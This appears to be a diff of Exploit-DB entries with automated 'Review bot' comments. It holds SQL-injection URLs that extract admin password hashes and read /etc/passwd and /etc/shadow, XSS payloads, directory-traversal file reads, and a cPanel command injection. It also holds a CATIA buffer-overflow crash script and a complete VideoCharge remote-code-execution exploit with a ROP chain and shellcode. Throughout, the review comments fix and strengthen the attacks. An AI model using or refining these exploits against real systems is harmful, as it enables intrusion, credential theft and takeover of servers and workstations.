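Review bot: the script runs without "use strict", so $url, $option, $id, $tabel, $itemid and $klm inside blind() are undeclared package globals; add "use strict;" and "my" declarations (blind() already shadows the outer $url and $id with its own lexicals, which works but is confusing to read). $option is compared with "eq 1" and "eq 2" (string comparison of a numeric argument); use "==" or quote the literals. The usage text printed by die is in Indonesian ("Cara Mengunakan : perl $0 host option id tabel itemid" is "How to use"), while the banner and the rest of the comments are English; an English usage line in the header would help readers. The main loop also hard-codes a 32-character maximum (for $i = 1..32); document that limit in the usage text.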


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29253/info
ACGV News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ACGV News 0.9.1 is vulnerable; other versions may also be affected.
http://www.example.com/ACGVnews/glossaire.php?id=[SQL]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29253/info
ACGV News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ACGV News 0.9.1 is vulnerable; other versions may also be affected.
http://www.example.com/ACGVnews/glossaire.php?id="><script>alert(document.cookie)</script>

platforms/php/webapps/31803.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29254/info
AN Guestbook (ANG) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ANG 0.4 is vulnerable; other versions may also be affected.
http://www.example.com/ang/send_email.php?postid=[XSS]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29255/info
Digital Hive is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Digital Hive 2.0 RC2 is vulnerable; other versions may also be affected.
http://www.example.com/hive_v2.0_RC2/template/purpletech/base_include.php?page=../../etc/passwd
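Review bot: the traversal depth in the PoC is only two levels (`../../`), which from `template/purpletech/` climbs to the application root, not to `/`, and PHP resolves a relative include against the current working directory and include_path rather than the script's own directory; state the directory the request was tested from, or use enough `../` segments to reach `/` (surplus segments are harmless once at the root). The entry also does not say whether `base_include.php` appends a suffix to `$page`; if it does, reading `/etc/passwd` only works with a null-byte terminator on PHP versions that still honour it, and that caveat belongs here.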


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/29261/info
The 'KuiraniKerim' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=KuraniKerim&op=TurkceNuke_Com_Islami_Moduller_Destek_Sitesi&sid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd,aid,2,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
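Review bot: the module name is spelled 'KuiraniKerim' in the description but `name=KuraniKerim` in the URL; one of them is a typo and a reader working from the description will never reach the module. The payload itself is a five-column UNION (`0,pwd,aid,2,3`) against `nuke_authors WHERE radminsuper=1`, i.e. it pulls the super-admin password hash and login, with `/**/` standing in for spaces and a trailing `/*` (`%2F%2A`) commenting out the rest of the query; that should be spelled out, together with the affected module version, since a PHP-Nuke third-party module has no version in the title.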


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29275/info
The 'bcoos' program is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to include local scripts in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks.
This issue affects bcoos 1.0.13; other versions may also be affected.
http://www.example.com/bcoos/class/debug/highlight.php?file=../../../../../boot.ini
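Review bot: the description says the flaw lets an attacker 'include local scripts in the context of the application', but the PoC passes `../../../../../boot.ini` to a syntax highlighter (`class/debug/highlight.php`), which discloses file contents rather than executing them; either the description should say local file disclosure, or the entry should show that `file=` reaches an include()/require(). The example also targets Windows (`boot.ini`); on a Linux host the equivalent check is `/etc/passwd` at the same depth.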

platforms/php/webapps/31807.txt Executable file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/29277/info
cPanel is prone to a remote privilege-escalation vulnerability because of an unspecified error.
Successfully exploiting this issue allows remote attackers to gain administrative privileges to the affected application and execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the webserver and the underlying system; other attacks are also possible.
Test it:
++++++++++++++++++++++++++
Step 1
Save this file in /home/user/public_html/do.pl .
#!/usr/bin/perl
$old='/home/user/public_html/test.txt';
$new='/home/root/kon.txt';
rename $old, $new;
++++++++++++++++++++++++++
step 2
make a text file named test.txt in your public_html directory.
path will be : /home/user/public_html/test.txt .
++++++++++++++++++++++++++
step 3
create an account and write ali@hackerz.ir;./home/user/public_html/do.pl in E-mail Address text box
then click on the "create" button.
Yes , you can find your file in /home/root/ .
++++++++++++++++++++++++++
()()()()()()()()()()()()()
you can run your own code !(mass defacer, exploit's or everything that u want).
Enjoy it...
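Review bot: the injected value `ali@hackerz.ir;./home/user/public_html/do.pl` is a shell command injection (the `;` ends the command cPanel builds around the e-mail address), and two details in step 3 decide whether it runs: `./home/user/...` is relative to whatever directory the cPanel process happens to run in, so the absolute form `/home/user/public_html/do.pl` is the safer choice, and `do.pl` must be executable (`chmod +x do.pl` after step 1) for the shell to run it by path. Step 1 should also note that `/home/root/` is not the default root home directory (`/root` is), so the rename to `/home/root/kon.txt` only succeeds where that directory exists; renaming into any root-owned, non-world-writable directory is a more portable proof. These checks matter because the 'remote privilege-escalation' title rests entirely on the file appearing in a directory only root can write to.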


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29291/info
AppServ Open Project is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
AppServ Open Project 2.5.10 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?appservlang=">[XSS] http://www.example.com/index.php?appservlang="><IMG%20SRC=java script:alert(/XSS/)> http://www.example.com/index.php?appservlang="><BODY%20ONLOAD=alert(/ xss/)> http://www.example.com/index.php?appservlang="><script>window.open(/phpinfo.php/)</script> http://www.example.com/index.php?appservlang="><INPUT%20TYPE="xss"> http://www.example.com/index.php?appservlang="><iframe%20src=http://www.example2.com> http://www.example.com/index.php?appservlang="><BR><input%20type%20=%20"password"%20name="pass"/><button%20onClick="java script:alert(/I%20have%20your%20password:%20/%20+%20pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
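Review bot: the seven PoC URLs have been run together on one line, and the `java script:` spellings (with a space) appear to be the publishing platform's neutering of `javascript:`; a browser will not execute `java script:alert(...)` with a literal space in the scheme, so a reader must restore `javascript:` before testing. The last payload (a fake password field plus a button) also depends on the `%20` encoding staying intact because the `onClick` handler contains spaces; one URL per line plus a sentence on the encoding would make the entry reproducible.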


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29295/info
Starsgames Control Panel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Starsgames Control Panel 4.6.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?showtopic=18&st=&lt;/textarea&gt;<script>alert(/xss/)</script> http://www.example.com/index.php?showtopic=18&st=&lt;/textarea&gt;<iframe src=http://www.google.com>
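Review bot: the `&lt;/textarea&gt;` in both URLs is HTML entity encoding from the page that rendered the advisory, not the payload; the `st` parameter must receive a literal `</textarea>` (URL-encoded `%3C/textarea%3E`) to break out of the textarea before the `<script>` or `<iframe>` tag is parsed, so the entry should show the raw payload. The two URLs are also run together on one line.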

platforms/php/webapps/31810.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/29296/info
Web Slider is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Web Slider 0.6 is vulnerable; other versions may also be affected.
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,concat(CHAR(0x75,0x73,0x65,0x72,0x3A,0xD,0xA),username,0x3a,password),2,concat(database(),char(58),0x2020,version()),4+from+users/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,concat(user(),0x3a,password),null,concat(database(),0x2020,version()),4+from+mysql.user/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,load_file(0x6574632F706173737764),2,0,4+from+users/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,load_file(CONCAT(CHAR(0x65),CHAR(0x74),CHAR(0x63),CHAR(0x2F),CHAR(0x70),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x77),CHAR(0x64))),2,0,4+from+users/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(0x6574632F706173737764),50),2,0,4+from+users/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(etc/passwd),50),2,0,4+from+users/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(etc/shadow),50),2,0,4+from+users/*
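Review bot: the `load_file()` arguments are wrong in two ways. `0x6574632F706173737764` decodes to `etc/passwd` without the leading slash, so it is not the absolute path LOAD_FILE requires; the correct hex is `0x2F6574632F706173737764` (`/etc/passwd`), and the CHAR() form in the fourth URL needs a `CHAR(0x2F)` prepended for the same reason. The last two URLs pass `etc/passwd` and `etc/shadow` unquoted, which MySQL parses as one identifier divided by another and rejects with an unknown-column error. Independently of the path, LOAD_FILE returns NULL unless the database user holds the FILE privilege and the mysqld process can read the file, which rules out `/etc/shadow` on any sanely configured host; say so, so that a NULL column is not read as 'not vulnerable'.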

platforms/windows/dos/31791.py Executable file

@ -0,0 +1,101 @@
'''
# Title: Dassault Syst?mes Catia V5-6R2013 "CATV5_Backbone_Bus" Stack Buffer Overflow
# Date: 2-18-2014
# Author: Mohamed Shetta
Email: mshetta |at| live |dot| com
# Vendor Homepage: http://www.3ds.com/products-services/catia/portfolio/catia-v5/latest-release/
# Tested on: Windows 7 & Windows XP
#Vulnerability type: Remote Code Execution
#Vulnerable file: CATSysDemon.exe
#PORT: 55558 Or 55555
---------------------------------------------------------------------------------------------------------
Software Description:
CATIA developed by Dassault Syst?mes (3DS) is the world leading integrated suite of Computer Aided Design (CAD), Engineering (CAE) and Manufacturing (CAM) applications for digital product definition and lifecycle management. CATIA is widely used in aerospace, automotive, shipbuilding, energy and many other industries. CATIA Composites Design is a workbench in CATIA supporting composites design, engineering and manufacture of complex 3D composites parts containing up to thousands of plies each. Specific developments by Dassault Syst?mes allow the transfer of the composites model and determination of anisotropic material properties from the constantly-chaging fiber orientations and ply thicknesses within realistic 3D industrial components. These varying material properties in the component have to be used by numerical codes such as ACEL-NDT and the FE solver based on XLIFE++ for accurate analyses of these parts (note that trivial composites components like flat panels can be analysed by the numerical codes independently).
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
A stack buffer overflow occurs when copying a user supplied input to a fixed size stack buffer.
The copying procedure stops when a null byte is found and no size check is proceeded.
The same copying pattern is used for more than one time in the vulnerable procedure but only the below one can be exploited.
---------------------------------------------------------------------------------------------------------
Vulnerable Code:
EAX contains the User Supplied data.
00406330 |> /8A08 /MOV CL,BYTE PTR DS:[EAX]
00406332 |. |880C02 |MOV BYTE PTR DS:[EDX+EAX],CL
00406335 |. |40 |INC EAX
00406336 |. |84C9 |TEST CL,CL
00406338 |.^\75 F6 \JNZ SHORT 00406330 ; CATSysDe.00406330
----------------------------------------------------------------------------------------------------------
Registers Dumb:
EAX 00000000
ECX FFB26363
EDX FFB28E70
EBX 00A5A7AA ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 00A5A630 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EBP 72106AE1 MSVCR90.strncmp
ESI 00A5A674 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EDI 00A5A678 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EIP 90909090
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit FFFAF000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0
EFL 00000212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
-------------------------------------------------------------------------------------------------------------
Triggering Packet Details:
(Packet) Details
(XXXX)Size of Next Data | (XXXX)Base for pointers, Set to zero for easy of exploitation. | (A*20)Junk | ("AppToBusInitMsg"+"\x00") Required String | (A*48)Junk | ("CATV5_Backbone_Bus"+"\x00")Required String | (B*49)Junk | (00000000)For Valid Message Sequence(0x00403C13) | (c*408)Junk | (XXXXXXXX)RetAdd | (c*357)small case to prevent converting shell code to small case | (Shell) Shell Code
-----------------------------------------------------------------------------------------------------------
Restrictions:
Only the most significant byte in the Return Address can be zero.
------------------------------------------------------------------------------------------------------------
Disclosure timeline:
12/15/2013 - Vendor notified and no response.
2/18/2014 - Public disclosure
'''
#!/usr/bin/env python
import socket
import struct
import ctypes
RetAdd="\x90\x90\x90\x90"
Shell="A" *1000
buff= "\x00\x00\x00\x00" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "A" * 48 + "CATV5_Backbone_Bus" +"\x00" + "B"* 49 + "\x00\x00\x00\x00" +"c"* 408 + RetAdd + "c"* 357 + Shell
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.4", 55555))
s.send(struct.pack('>I',len(buff) ))
s.send(buff)
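Review bot: the 'Restrictions' paragraph and the packet layout need reconciling. The copy loop at 00406330 stops at the first null byte, and the packet places `RetAdd` before `"c"*357` and the shellcode, so a return address whose most significant byte is zero (stored last in little-endian) would end the copy before the shellcode is written; either the shellcode has to sit before the return address and be reached through a register (ESP, ESI and EDI all point into the `c` junk in the dump), or the restriction should say no zero bytes at all. As committed the script is a crash PoC rather than the RCE the header claims: `RetAdd` is `\x90\x90\x90\x90` (hence EIP 90909090 in the dump) and `Shell` is 1000 bytes of `A`. Smaller points: the `ctypes` import is unused, the target `192.168.0.4` is hard-coded where `sys.argv` would do, 'Registers Dumb' should read 'Registers Dump', and 'Syst?mes' is a mis-encoded 'Systèmes'.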

platforms/windows/remote/31788.py Executable file

@ -0,0 +1,118 @@
#!/usr/bin/python
# Exploit Title: VideoCharge Studio v2.12.3.685 GetHttpResponse() MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
# Version: v2.12.3.685
# Date: 2014-02-19
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.videocharge.com
# Tested on: Win7-GER (DEP enabled)
#
# Howto / Notes:
# Since it's a MITM RCE you need to spoof the DNS Record for www.videocharge.com in order to successfully exploit this vulnerability
#
from socket import *
from struct import pack
from time import sleep
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
# Thanks Giuseppe D'Amore for the amazing shellcode
# http://www.exploit-db.com/exploits/28996/
shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
junk0 = "\x90" * 1277
junk1 = "\x90" * 1900
nops="\x90" * 30
jmpesp=pack('<L',0x102340e8) * 5 # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]
# jump to controlled memory
eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN [zlib1.dll]
#
# ROP registers structure:
# EBP - VirtualProtect() call
# ESP - lpAddress
# EBX - dwSize
# EDX - flNewProtect
# ECX - lpflOldProtect
#
# Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF] and MOV to EBP
rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
rop += pack('<L',0xDE2D66F9) # XOR param 1
rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]
rop += pack('<L',0xDEADBEEF) # XOR param 2
rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] # RETN [cc.dll]
rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll]
rop += pack('<L',0xDEADBEEF) # Filler
rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]
# Craft VirtualProtect() dwSize in EAX and MOV to EBX
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]
rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll]
# Craft VirtualProtect() flNewProtect in EAX and MOV to EDX
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]
rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]
# Put writable offset for VirtualProtect() lpflOldProtect to ECX
rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]
rop += pack('<L',0x61B96180) # writable location [zlib1.dll]
# POP a value from the stack after PUSHAD and POP value to ESI
# as a preparation for the VirtualProtect() call
rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]
rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
# Achievement unlocked: PUSHAD
rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll]
rop += pack('<L',0x102340c5) # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]
payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode
buffer = "HTTP/1.1 200 OK\r\n"
buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"
buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"
buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 4000\r\n"
buffer += "Connection: close\r\n"
buffer += "Content-Type: text/html\r\n\r\n"
buffer += payload
buffer += "\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending exploit: OK\n"
sleep(3)
cl.close()
s.close()
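Review bot: the `Content-Length: 4000` header does not match the body. The payload is 1277 + 4 + 1900 + 108 (27 ROP dwords) + 20 + 30 + 113 bytes of shellcode, roughly 3,450 bytes plus the trailing `\r\n`, so a client that honours Content-Length waits for about 550 bytes that never arrive until the three-second sleep and close, and a stricter HTTP stack may discard the response; set the header from `len(payload)` or pad the body to 4000. Two smaller points: `host = "192.168.0.1"` is the listener's bind address, not the victim's, and should be `0.0.0.0` or an argument, since the DNS-spoofing note at the top requires the listener to sit on whatever address www.videocharge.com resolves to; and the ROP comments would be easier to follow with the derived constants named, e.g. that 0x25 + 0x0C + 0x0C + 0x03 = 0x40 is PAGE_EXECUTE_READWRITE for flNewProtect (the XOR comment already gives 0xDE2D66F9 ^ 0xDEADBEEF = 0x0080D816 for the VirtualProtect pointer, which checks out).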